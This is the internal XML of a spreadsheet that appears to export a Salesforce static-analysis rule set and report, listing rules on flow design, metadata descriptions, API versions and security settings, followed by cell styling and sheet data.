    <t>System bypass logic is required for custom validation rules for integration Users.
      &lt;br/&gt;&lt;br/&gt;
      This rule is specifically for nCino implementations and is not relevant outside of that.
      If you are not using nCino in your Org, do not activate this rule.
      nCino specific rules can be determined by the tag ncino-specific.</t>
  </si>
  <si>
    <t>sfmeta:SystemBypassLogicWorkflow</t>
  </si>
  <si>
    <t>System Bypass Logic - Workflow Rules</t>
  </si>
  <si>
    <t>System bypass logic is required in custom workflow rules for integration Users.
      &lt;br/&gt;&lt;br/&gt;
      This rule is specifically for nCino implementations and is not relevant outside of that.
      If you are not using nCino in your Org, do not activate this rule.
      nCino specific rules can be determined by the tag ncino-specific.</t>
  </si>
  <si>
    <t>sfmeta:RequireDescriptionComponent</t>
  </si>
  <si>
    <t>Custom Metadata components must have a description field</t>
  </si>
  <si>
    <t>Custom Metadata components should have a description of their functionality making it easy
for others to understand the purpose and functionality of the component as it may not always
be understandable from the name.
&lt;br/&gt;&lt;br/&gt;
If you have a project namespace, then it's recommended to include this namespace into
the description of your shared components. You can configure this rule to verify this by setting
additional property 'requireProjectNamespace' of this rule to true value.
&lt;br/&gt;&lt;br/&gt;
Please Note: Checking projects namespace inside component description will work only with the Salesforce
integration type in CodeScan Cloud. It requires execution of extra Metadata APIs to retrieve the
properties of Metadata components in your project.
&lt;br/&gt;&lt;br/&gt;
Alternatively you may manually create the required 'component-properties.json' file which includes results
of executing 'sfdx force:mdapi:listmetadata' properties and put it inside root of your project. In this case
the rule will also be able to verify project namespace in the shared components of your project.
     &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;
&amp;lt;CustomObject xmlns="http://soap.sforce.com/2006/04/metadata"&amp;gt;
	........
    &amp;lt;fields&amp;gt;
        &amp;lt;fullName&gt;Price__c&amp;lt;/fullName&amp;gt;       //Bad: This custom field does not have a description.
        &amp;lt;externalId&gt;false&amp;lt;/externalId&amp;gt;
        &amp;lt;label&amp;gt;Price&amp;lt;/label&amp;gt;
        &amp;lt;type&gt;Currency&amp;lt;/type&amp;gt;
    &amp;lt;/fields&amp;gt;
  ..........
&amp;lt;/CustomObject&amp;gt;
&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;
&amp;lt;CustomObject xmlns="http://soap.sforce.com/2006/04/metadata"&amp;gt;
	........
    &amp;lt;fields&gt;
        &amp;lt;fullName&gt;Price__c&amp;lt;/fullName&amp;gt;
        &amp;lt;description&amp;gt;This is a description of price&amp;lt;/description&amp;gt;   //Good: A description is recommended.
        &amp;lt;externalId&amp;gt;false&amp;lt;/externalId&amp;gt;
        &amp;lt;label&amp;gt;Price&amp;lt;/label&amp;gt;
        &amp;lt;type&amp;gt;Currency&amp;lt;/type&amp;gt;
    &amp;lt;/fields&amp;gt;
  ..........
&amp;lt;/CustomObject&amp;gt;
&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;
&amp;lt;CustomField xmlns="http://soap.sforce.com/2006/04/metadata"&amp;gt;
	........
      &amp;lt;fullName&gt;Price__c&amp;lt;/fullName&amp;gt;       //Bad: This custom field does not have a description.
      &amp;lt;externalId&gt;false&amp;lt;/externalId&amp;gt;
      &amp;lt;label&amp;gt;Price&amp;lt;/label&amp;gt;
      &amp;lt;type&gt;Currency&amp;lt;/type&amp;gt;
  ..........
&amp;lt;/CustomField&amp;gt;
&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;
&amp;lt;CustomField xmlns="http://soap.sforce.com/2006/04/metadata"&amp;gt;
	........
      &amp;lt;fullName&gt;Price__c&amp;lt;/fullName&amp;gt;
      &amp;lt;description&amp;gt;This is a description of price&amp;lt;/description&amp;gt;   //Good: A description is recommended.
      &amp;lt;externalId&amp;gt;false&amp;lt;/externalId&amp;gt;
      &amp;lt;label&amp;gt;Price&amp;lt;/label&amp;gt;
      &amp;lt;type&amp;gt;Currency&amp;lt;/type&amp;gt;
  ..........
&amp;lt;/CustomField&amp;gt;
     &lt;/pre&gt;</t>
  </si>
  <si>
    <t>common-sfmeta:FailedUnitTests</t>
  </si>
  <si>
    <t>sfmeta:SecuritySettings</t>
  </si>
  <si>
    <t>Enforce Org Security Settings</t>
  </si>
  <si>
    <t>Enforce various org security settings. Default settings can be modified and any password policy or session setting configured.
This rule requires .settings file using
&amp;lt;types&amp;gt;
	&amp;lt;members&amp;gt;Security&amp;lt;/members&amp;gt;
    &amp;lt;name&amp;gt;Settings&amp;lt;/name&amp;gt;
&amp;lt;/types&amp;gt;</t>
  </si>
  <si>
    <t>sfmeta:RequireDescriptionField</t>
  </si>
  <si>
    <t>Custom fields must have a description field</t>
  </si>
  <si>
    <t>Custom fields should have a description of their function to avoid confusion.
This rule requires .object or .field-meta.xml metadata files to be downloaded.
&lt;br/&gt;&lt;br/&gt;
This rule has been deprecated and all functionality added to sfmeta:RequireDescriptionComponent.
Please remove this deprecated rule from your custom Quality Profile and add sfmeta:RequireDescriptionComponent.
     &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;
&amp;lt;CustomObject xmlns="http://soap.sforce.com/2006/04/metadata"&amp;gt;
	........
    &amp;lt;fields&amp;gt;
        &amp;lt;fullName&gt;Price__c&amp;lt;/fullName&amp;gt;       //Bad: This custom field does not have a description.
        &amp;lt;externalId&gt;false&amp;lt;/externalId&amp;gt;
        &amp;lt;label&amp;gt;Price&amp;lt;/label&amp;gt;
        &amp;lt;type&gt;Currency&amp;lt;/type&amp;gt;
    &amp;lt;/fields&amp;gt;
  ..........
&amp;lt;/CustomObject&amp;gt;
&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;
&amp;lt;CustomObject xmlns="http://soap.sforce.com/2006/04/metadata"&amp;gt;
	........
    &amp;lt;fields&gt;
        &amp;lt;fullName&gt;Price__c&amp;lt;/fullName&amp;gt;
        &amp;lt;description&amp;gt;This is a description of price&amp;lt;/description&amp;gt;   //Good: A description is recommended.
        &amp;lt;externalId&amp;gt;false&amp;lt;/externalId&amp;gt;
        &amp;lt;label&amp;gt;Price&amp;lt;/label&amp;gt;
        &amp;lt;type&amp;gt;Currency&amp;lt;/type&amp;gt;
    &amp;lt;/fields&amp;gt;
  ..........
&amp;lt;/CustomObject&amp;gt;
&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;
&amp;lt;CustomField xmlns="http://soap.sforce.com/2006/04/metadata"&amp;gt;
	........
      &amp;lt;fullName&gt;Price__c&amp;lt;/fullName&amp;gt;       //Bad: This custom field does not have a description.
      &amp;lt;externalId&gt;false&amp;lt;/externalId&amp;gt;
      &amp;lt;label&amp;gt;Price&amp;lt;/label&amp;gt;
      &amp;lt;type&gt;Currency&amp;lt;/type&amp;gt;
  ..........
&amp;lt;/CustomField&amp;gt;
&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;
&amp;lt;CustomField xmlns="http://soap.sforce.com/2006/04/metadata"&amp;gt;
	........
      &amp;lt;fullName&gt;Price__c&amp;lt;/fullName&amp;gt;
      &amp;lt;description&amp;gt;This is a description of price&amp;lt;/description&amp;gt;   //Good: A description is recommended.
      &amp;lt;externalId&amp;gt;false&amp;lt;/externalId&amp;gt;
      &amp;lt;label&amp;gt;Price&amp;lt;/label&amp;gt;
      &amp;lt;type&amp;gt;Currency&amp;lt;/type&amp;gt;
  ..........
&amp;lt;/CustomField&amp;gt;
     &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sfmeta:HardCodedFlowValue</t>
  </si>
  <si>
    <t>Avoid Hard Coded Values in Flows</t>
  </si>
  <si>
    <t>Hard coded values in flows can lead to unexpected output and make maintenance difficult. Instead, Get Records can be used for the respective object using the DeveloperName. If you’re creating criteria in an entry condition, you can reference DeveloperName (API Name) fields with a formula.</t>
  </si>
  <si>
    <t>sfmeta:AvoidLargeFlows</t>
  </si>
  <si>
    <t>Avoid Large Flows</t>
  </si>
  <si>
    <t>Too many nodes can cause your Flow to become complex and unmanageable. Consider using Subflows to make your Flow logic reusable and scalable.</t>
  </si>
  <si>
    <t>sfmeta:AvoidNestedFlowLoops</t>
  </si>
  <si>
    <t>Avoid Nested Loops In Flows</t>
  </si>
  <si>
    <t>Nested loops within your Flows can cause them to become unreadable, inefficient and complex. Consider using Invoked Actions to clean up complex Flows.</t>
  </si>
  <si>
    <t>sfmeta:DmlInFlowLoop</t>
  </si>
  <si>
    <t>DML Should Not Be Called In Loops</t>
  </si>
  <si>
    <t>Using DML in loops can cause Governor Limit Exceptions.</t>
  </si>
  <si>
    <t>sfmeta:DocumentFlows</t>
  </si>
  <si>
    <t>Document Flows</t>
  </si>
  <si>
    <t>Well documented flows ensure that any member on the team is able to understand the purpose and function of the flow. Documenting the purpose of your Flow, the objects it touches and where it’s invoked from can ensure the maintainability of that Flow in the future.</t>
  </si>
  <si>
    <t>sfmeta:DuplicateFlowDml</t>
  </si>
  <si>
    <t>Duplicate DML operations in Flows</t>
  </si>
  <si>
    <t>Users should not navigate back between screens if the Flow commits changes to the database or performs actions. This rule aims to avoid potential issues caused by duplicate database operations that might occur if users go back and forth between screens, triggering the same actions multiple times.</t>
  </si>
  <si>
    <t>sfmeta:FlowDMLNaming</t>
  </si>
  <si>
    <t>Flow DML Naming</t>
  </si>
  <si>
    <t>Standardized naming conventions allow an organizations flows to be clean, maintainable and readable. This rule enforces standard naming conventions for DML operations (Query, Update, Create, Delete)</t>
  </si>
  <si>
    <t>sfmeta:FlowInteractionNaming</t>
  </si>
  <si>
    <t>Flow Interaction Naming</t>
  </si>
  <si>
    <t>Standardized naming conventions allow an organizations flows to be clean, maintainable and readable.This rule enforces standard naming conventions for Screens, Actions and Emails.</t>
  </si>
  <si>
    <t>sfmeta:FlowLogicNaming</t>
  </si>
  <si>
    <t>Flow Logic Naming</t>
  </si>
  <si>
    <t>Standardized naming conventions allow an organization's flows to be clean, maintainable, and readable. This rule enforces standard naming conventions for Decisions, Assignments, and Loops.</t>
  </si>
  <si>
    <t>sfmeta:FlowNaming</t>
  </si>
  <si>
    <t>Flow Naming</t>
  </si>
  <si>
    <t>Standardized naming conventions allow an organizations flows to be clean, maintainable and readable. This rule enforces standard naming conventions for Flows and Domains.</t>
  </si>
  <si>
    <t>sfmeta:FlowVariableResourceNaming</t>
  </si>
  <si>
    <t>Flow Variables &amp; Resources Naming</t>
  </si>
  <si>
    <t>Standardized naming conventions allow an organizations flows to be clean, maintainable and readable. This rule enforces standard naming conventions for Variables, Formulas and Choices.</t>
  </si>
  <si>
    <t>sfmeta:OldFlowApi</t>
  </si>
  <si>
    <t>Flows API Version Is Too Old</t>
  </si>
  <si>
    <t>This rule identifies flows which are using older API versions. Consider updating the API versions of any flows found.</t>
  </si>
  <si>
    <t>sfmeta:FaultPathsInFlow</t>
  </si>
  <si>
    <t>Flows Should Include Fault Paths</t>
  </si>
  <si>
    <t>Fault paths are a way to handle errors that may occur in your flow. Depending on the Flow and it’s purpose, errors can be logged, show an error screen or send an email of the failure to a group of users. Flows should include Fault paths to ensure that all errors are handled appropriately.</t>
  </si>
  <si>
    <t>sfmeta:FilterGetRecords</t>
  </si>
  <si>
    <t>Get Records Should Be Filtered</t>
  </si>
  <si>
    <t>This rule mandates the usage of at least one filter in the Data element "Get Records" within Salesforce Flows. Enforcing this rule will encourage flow designers to think critically about their data retrieval needs and apply relevant filters, reducing the risk of performance bottlenecks and unoptimized queries.</t>
  </si>
  <si>
    <t>sfmeta:RemoveInactiveFlows</t>
  </si>
  <si>
    <t>Inactive flows should be removed</t>
  </si>
  <si>
    <t>Inactive flows may cause clutter in the Salesforce org. In extreme cases they can begin to hit the organizations limits. These should be removed if not being used</t>
  </si>
  <si>
    <t>sfmeta:MigrateToFlow</t>
  </si>
  <si>
    <t>Migrate Workflows and Processes To Flows</t>
  </si>
  <si>
    <t>Process Builders and Workflows are being phased out over the coming year. In Winter '23 the ability to create new Workflows will be turned off, in Summer '23 the ability to create new Processes with Process Builder will be turned off. It is recommended that these Processes and Workflows are migrated to Flows. For more information, please see this link: (Salesforce: Transition to Flows)[Help And Training Community]</t>
  </si>
  <si>
    <t>sfmeta:FlowNullHandler</t>
  </si>
  <si>
    <t>Missing Null Handler After Get Records in Flow</t>
  </si>
  <si>
    <t>Currently, when the Get Records operation doesn't find any data, it returns a null value.
By implementing a decision element to validate the result of the Get Records operation, we can proactively identify and handle cases where no data is retrieved. This allows us to avoid potential null reference errors and prevent unexpected crashes or data processing issues.</t>
  </si>
  <si>
    <t>sfmeta:UnusedFlowVariables</t>
  </si>
  <si>
    <t>Unused Flow Variables</t>
  </si>
  <si>
    <t>Consider removing unused Flow variables to increase performance and readability.</t>
  </si>
  <si>
    <t>sfmeta:FastFieldUpdates</t>
  </si>
  <si>
    <t>Use Fast Field Updates</t>
  </si>
  <si>
    <t>If a flow is only updating the record that triggered it, it should be using the Fast Field Updates option. This can be up to 10 times faster than the more flexible Actions and Related Records Flow.</t>
  </si>
  <si>
    <t>sfmeta:ICULocaleFormats</t>
  </si>
  <si>
    <t>Adopt the ICU Locale Formats instead of JDK locale formats</t>
  </si>
  <si>
    <t>Salesforce is retiring the JDK locale formats with the Spring ’24 release. ICU is the new standard and enforced in API version 45. Make sure your custom code does not make use of JDK locale formats and instead uses locale-neutral methods.</t>
  </si>
  <si>
    <t>sfmeta:APIVersionsRetired</t>
  </si>
  <si>
    <t>sfmeta:EnableLWS</t>
  </si>
  <si>
    <t>Enable Salesforce Lightning Web Security (LWS)</t>
  </si>
  <si>
    <t>LWS is a security feature that enhances the security of Lightning components and helps prevent cross-site scripting (XSS) attacks.</t>
  </si>
  <si>
    <t>sfmeta:RollUpOveruse</t>
  </si>
  <si>
    <t>Potential Overuse of Roll-Up Summaries</t>
  </si>
  <si>
    <t>Ensure compliance with Salesforce's object limit of 25 roll-up summary fields per object to prevent potential issues arising from exceeding Salesforce platform limits.</t>
  </si>
  <si>
    <t>sfmeta:AutoLayoutFlows</t>
  </si>
  <si>
    <t>Set Flows to Auto Layout</t>
  </si>
  <si>
    <t>Implementing auto-layout for your flows helps Designers to modify layouts more quickly, allowing them to iterate on their designs with greater speed. It ensures elements are perfectly aligned and evenly spaced, improving readability in complex Flows.</t>
  </si>
  <si>
    <t>sfmeta:NcinoInactiveWorkflowRule</t>
  </si>
  <si>
    <t>nCino Inactive Workflow Rules</t>
  </si>
  <si>
    <t>Removing inactive, unmanaged workflow rules in a Salesforce instance allows you to maintain an organized workflow environment.</t>
  </si>
  <si>
    <t>sfmeta:ExposedLightningMessageChannel</t>
  </si>
  <si>
    <t>Exposed Lightning Message Channel</t>
  </si>
  <si>
    <t>It is recommended to verify instances where the 'isExposed' flag in Lightning Message Channels is set to true. Setting this flag can lead to unintended access to the Lightning Message Service (LMS) API, potentially resulting in unauthorized message publishing and subscribing across components within the Salesforce ecosystem.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</si>
</sst>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rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <charset val="1"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <charset val="1"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <charset val="1"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <charset val="1"/>
    </font>
  </fonts>
  <fills count="6">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFDAE3F3"/>
        <bgColor rgb="FFCCFFFF"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="3" tint="0.79998168889431442"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="8" tint="0.59999389629810485"/>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1" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="1" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="1" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="4" fillId="5" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="5" fillId="3" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="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8"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="A10" zoomScaleNormal="100" workbookViewId="0">
      <selection activeCell="I26" sqref="I26"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.85546875" defaultRowHeight="15"/>
  <cols>
    <col min="1" max="1" width="27" customWidth="1"/>
    <col min="2" max="2" width="6.42578125" customWidth="1"/>
    <col min="3" max="3" width="32.85546875" customWidth="1"/>
    <col min="4" max="1024" width="8.42578125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="18" customHeight="1">
      <c r="A1" s="11" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="11"/>
      <c r="C1" s="11"/>
      <c r="D1" s="11"/>
      <c r="E1" s="11"/>
      <c r="F1" s="11"/>
      <c r="G1" s="11"/>
      <c r="H1" s="11"/>
    </row>
    <row r="2" spans="1:8">
      <c r="A2" s="2"/>
      <c r="B2" s="3"/>
      <c r="C2" s="3"/>
      <c r="D2" s="3"/>
      <c r="E2" s="3"/>
      <c r="F2" s="3"/>
      <c r="G2" s="3"/>
      <c r="H2" s="3"/>
    </row>
    <row r="3" spans="1:8">
      <c r="A3" s="2" t="s">
        <v>1</v>
      </c>
      <c r="B3" s="3"/>
      <c r="C3" s="3"/>
      <c r="D3" s="3"/>
      <c r="E3" s="3"/>
      <c r="F3" s="3"/>
      <c r="G3" s="3"/>
      <c r="H3" s="3"/>
    </row>
    <row r="4" spans="1:8">
      <c r="A4" s="3" t="s">
        <v>2</v>
      </c>
      <c r="B4" s="3"/>
      <c r="C4" s="3"/>
      <c r="D4" s="3"/>
      <c r="E4" s="3"/>
      <c r="F4" s="3"/>
      <c r="G4" s="3"/>
      <c r="H4" s="3"/>
    </row>
    <row r="5" spans="1:8">
      <c r="A5" s="3" t="s">
        <v>3</v>
      </c>
      <c r="B5" s="3"/>
      <c r="C5" s="3"/>
      <c r="D5" s="3"/>
      <c r="E5" s="3"/>
      <c r="F5" s="3"/>
      <c r="G5" s="3"/>
      <c r="H5" s="3"/>
    </row>
    <row r="6" spans="1:8">
      <c r="A6" s="3" t="s">
        <v>4</v>
      </c>
      <c r="B6" s="3"/>
      <c r="C6" s="3"/>
      <c r="D6" s="3"/>
      <c r="E6" s="3"/>
      <c r="F6" s="3"/>
      <c r="G6" s="3"/>
      <c r="H6" s="3"/>
    </row>
    <row r="7" spans="1:8">
      <c r="A7" s="3"/>
      <c r="B7" s="3"/>
      <c r="C7" s="3"/>
      <c r="D7" s="3"/>
      <c r="E7" s="3"/>
      <c r="F7" s="3"/>
      <c r="G7" s="3"/>
      <c r="H7" s="3"/>
    </row>
    <row r="8" spans="1:8">
      <c r="A8" s="10" t="s">
        <v>5</v>
      </c>
      <c r="B8" s="10">
        <v>775</v>
      </c>
      <c r="C8" s="8" t="s">
        <v>6</v>
      </c>
      <c r="D8" s="3"/>
      <c r="E8" s="3"/>
      <c r="F8" s="3"/>
      <c r="G8" s="3"/>
      <c r="H8" s="3"/>
    </row>
    <row r="9" spans="1:8">
      <c r="A9" s="10"/>
      <c r="B9" s="10"/>
      <c r="C9" s="8" t="s">
        <v>7</v>
      </c>
      <c r="D9" s="3"/>
      <c r="E9" s="3"/>
      <c r="F9" s="3"/>
      <c r="G9" s="3"/>
      <c r="H9" s="3"/>
    </row>
    <row r="10" spans="1:8">
      <c r="A10" s="10"/>
      <c r="B10" s="10"/>
      <c r="C10" s="8" t="s">
        <v>8</v>
      </c>
      <c r="D10" s="3"/>
      <c r="E10" s="3"/>
      <c r="F10" s="3"/>
      <c r="G10" s="3"/>
      <c r="H10" s="3"/>
    </row>
    <row r="11" spans="1:8">
      <c r="A11" s="10"/>
      <c r="B11" s="10"/>
      <c r="C11" s="8" t="s">
        <v>9</v>
      </c>
      <c r="D11" s="3"/>
      <c r="E11" s="3"/>
      <c r="F11" s="3"/>
      <c r="G11" s="3"/>
      <c r="H11" s="3"/>
    </row>
    <row r="12" spans="1:8">
      <c r="A12" s="10"/>
      <c r="B12" s="10"/>
      <c r="C12" s="4" t="s">
        <v>10</v>
      </c>
      <c r="D12" s="3"/>
      <c r="E12" s="3"/>
      <c r="F12" s="3"/>
      <c r="G12" s="3"/>
      <c r="H12" s="3"/>
    </row>
    <row r="13" spans="1:8">
      <c r="A13" s="10"/>
      <c r="B13" s="10"/>
      <c r="C13" s="4" t="s">
        <v>11</v>
      </c>
      <c r="D13" s="3"/>
      <c r="E13" s="3"/>
      <c r="F13" s="3"/>
      <c r="G13" s="3"/>
      <c r="H13" s="3"/>
    </row>
    <row r="14" spans="1:8">
      <c r="A14" s="10"/>
      <c r="B14" s="10"/>
      <c r="C14" s="4" t="s">
        <v>12</v>
      </c>
      <c r="D14" s="3"/>
      <c r="E14" s="3"/>
      <c r="F14" s="3"/>
      <c r="G14" s="3"/>
      <c r="H14" s="3"/>
    </row>
    <row r="15" spans="1:8">
      <c r="A15" s="3" t="s">
        <v>13</v>
      </c>
      <c r="B15" s="3">
        <f>COUNTA('security hotspots (apex)'!A3:A222) + COUNTA('security hotspots (vf and l)'!A3:A222)</f>
        <v>9</v>
      </c>
      <c r="C15" s="3"/>
      <c r="D15" s="3"/>
      <c r="E15" s="3"/>
      <c r="F15" s="3"/>
      <c r="G15" s="3"/>
      <c r="H15" s="3"/>
    </row>
    <row r="16" spans="1:8">
      <c r="A16" s="3" t="s">
        <v>14</v>
      </c>
      <c r="B16" s="3"/>
      <c r="C16" s="3"/>
      <c r="D16" s="3"/>
      <c r="E16" s="3"/>
      <c r="F16" s="3"/>
      <c r="G16" s="3"/>
      <c r="H16" s="3"/>
    </row>
    <row r="17" spans="1:8">
      <c r="A17" s="3"/>
      <c r="B17" s="3"/>
      <c r="C17" s="3"/>
      <c r="D17" s="3"/>
      <c r="E17" s="3"/>
      <c r="F17" s="3"/>
      <c r="G17" s="3"/>
      <c r="H17" s="3"/>
    </row>
    <row r="18" spans="1:8">
      <c r="A18" s="3" t="s">
        <v>15</v>
      </c>
      <c r="B18" s="3"/>
      <c r="C18" s="3"/>
      <c r="D18" s="3"/>
      <c r="E18" s="3"/>
      <c r="F18" s="3"/>
      <c r="G18" s="3"/>
      <c r="H18" s="3"/>
    </row>
    <row r="19" spans="1:8">
      <c r="A19" s="3" t="s">
        <v>16</v>
      </c>
      <c r="B19" s="3"/>
      <c r="C19" s="3"/>
      <c r="D19" s="3"/>
      <c r="E19" s="3"/>
      <c r="F19" s="3"/>
      <c r="G19" s="3"/>
      <c r="H19" s="3"/>
    </row>
    <row r="20" spans="1:8">
      <c r="A20" s="2" t="s">
        <v>17</v>
      </c>
      <c r="B20" s="3"/>
      <c r="C20" s="3"/>
      <c r="D20" s="3"/>
      <c r="E20" s="3"/>
      <c r="F20" s="3"/>
      <c r="G20" s="3"/>
      <c r="H20" s="3"/>
    </row>
    <row r="21" spans="1:8">
      <c r="A21" s="3" t="s">
        <v>18</v>
      </c>
      <c r="B21" s="3"/>
      <c r="C21" s="3"/>
      <c r="D21" s="3"/>
      <c r="E21" s="3"/>
      <c r="F21" s="3"/>
      <c r="G21" s="3"/>
      <c r="H21" s="3"/>
    </row>
    <row r="22" spans="1:8">
      <c r="A22" s="3" t="s">
        <v>19</v>
      </c>
      <c r="B22" s="3"/>
      <c r="C22" s="3"/>
      <c r="D22" s="3"/>
      <c r="E22" s="3"/>
      <c r="F22" s="3"/>
      <c r="G22" s="3"/>
      <c r="H22" s="3"/>
    </row>
    <row r="23" spans="1:8">
      <c r="A23" s="3" t="s">
        <v>20</v>
      </c>
      <c r="B23" s="3"/>
      <c r="C23" s="3"/>
      <c r="D23" s="3"/>
      <c r="E23" s="3"/>
      <c r="F23" s="3"/>
      <c r="G23" s="3"/>
      <c r="H23" s="3"/>
    </row>
    <row r="24" spans="1:8">
      <c r="A24" s="3" t="s">
        <v>21</v>
      </c>
      <c r="B24" s="3"/>
      <c r="C24" s="3"/>
      <c r="D24" s="3"/>
      <c r="E24" s="3"/>
      <c r="F24" s="3"/>
      <c r="G24" s="3"/>
      <c r="H24" s="3"/>
    </row>
    <row r="25" spans="1:8">
      <c r="A25" s="3"/>
      <c r="B25" s="3"/>
      <c r="C25" s="3"/>
      <c r="D25" s="3"/>
      <c r="E25" s="3"/>
      <c r="F25" s="3"/>
      <c r="G25" s="3"/>
      <c r="H25" s="3"/>
    </row>
    <row r="26" spans="1:8">
      <c r="A26" s="2" t="s">
        <v>22</v>
      </c>
      <c r="B26" s="3"/>
      <c r="C26" s="3"/>
      <c r="D26" s="3"/>
      <c r="E26" s="3"/>
      <c r="F26" s="3"/>
      <c r="G26" s="3"/>
      <c r="H26" s="3"/>
    </row>
    <row r="27" spans="1:8">
      <c r="A27" s="2" t="s">
        <v>23</v>
      </c>
      <c r="B27" s="3"/>
      <c r="C27" s="3"/>
      <c r="D27" s="3"/>
      <c r="E27" s="3"/>
      <c r="F27" s="3"/>
      <c r="G27" s="3"/>
      <c r="H27" s="3"/>
    </row>
    <row r="28" spans="1:8">
      <c r="A28" s="2" t="s">
        <v>24</v>
      </c>
      <c r="B28" s="3"/>
      <c r="C28" s="3"/>
      <c r="D28" s="3"/>
      <c r="E28" s="3"/>
      <c r="F28" s="3"/>
      <c r="G28" s="3"/>
      <c r="H28" s="3"/>
    </row>
  </sheetData>
  <mergeCells count="3">
    <mergeCell ref="A8:A14"/>
    <mergeCell ref="B8:B14"/>
    <mergeCell ref="A1:H1"/>
  </mergeCells>
  <pageMargins left="0.7" right="0.7"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D99CB-DA9E-45AA-970B-A4100E584F5A}">
  <dimension ref="A1:G263"/>
  <sheetViews>
    <sheetView topLeftCell="A251" workbookViewId="0">
      <selection activeCell="C272" sqref="C272"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.85546875" defaultRowHeight="15"/>
  <cols>
    <col min="1" max="1" width="20.28515625" customWidth="1"/>
    <col min="2" max="2" width="23.42578125" customWidth="1"/>
    <col min="3" max="3" width="40.28515625" customWidth="1"/>
    <col min="4" max="4" width="13.28515625" customWidth="1"/>
    <col min="5" max="5" width="14.85546875" customWidth="1"/>
    <col min="6" max="6" width="13.42578125" customWidth="1"/>
    <col min="7" max="7" width="14.28515625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7">
      <c r="A1" s="12" t="s">
        <v>25</v>
      </c>
      <c r="B1" s="13"/>
      <c r="C1" s="13"/>
      <c r="D1" s="13"/>
      <c r="E1" s="13"/>
      <c r="F1" s="13"/>
      <c r="G1" s="13"/>
    </row>
    <row r="2" spans="1:7">
      <c r="A2" s="7" t="s">
        <v>26</v>
      </c>
      <c r="B2" s="7" t="s">
        <v>27</v>
      </c>
      <c r="C2" s="7" t="s">
        <v>28</v>
      </c>
      <c r="D2" s="7" t="s">
        <v>29</v>
      </c>
      <c r="E2" s="7" t="s">
        <v>30</v>
      </c>
      <c r="F2" s="7" t="s">
        <v>31</v>
      </c>
      <c r="G2" s="7" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="3" spans="1:7">
      <c r="A3" s="1" t="s">
        <v>33</v>
      </c>
      <c r="B3" s="1" t="s">
        <v>34</v>
      </c>
      <c r="C3" s="1" t="s">
        <v>35</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>36</v>
      </c>
      <c r="E3" s="1" t="s">
        <v>37</v>
      </c>
      <c r="F3" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G3" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4" spans="1:7">
      <c r="A4" s="1" t="s">
        <v>39</v>
      </c>
      <c r="B4" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C4" s="1" t="s">
        <v>41</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>42</v>
      </c>
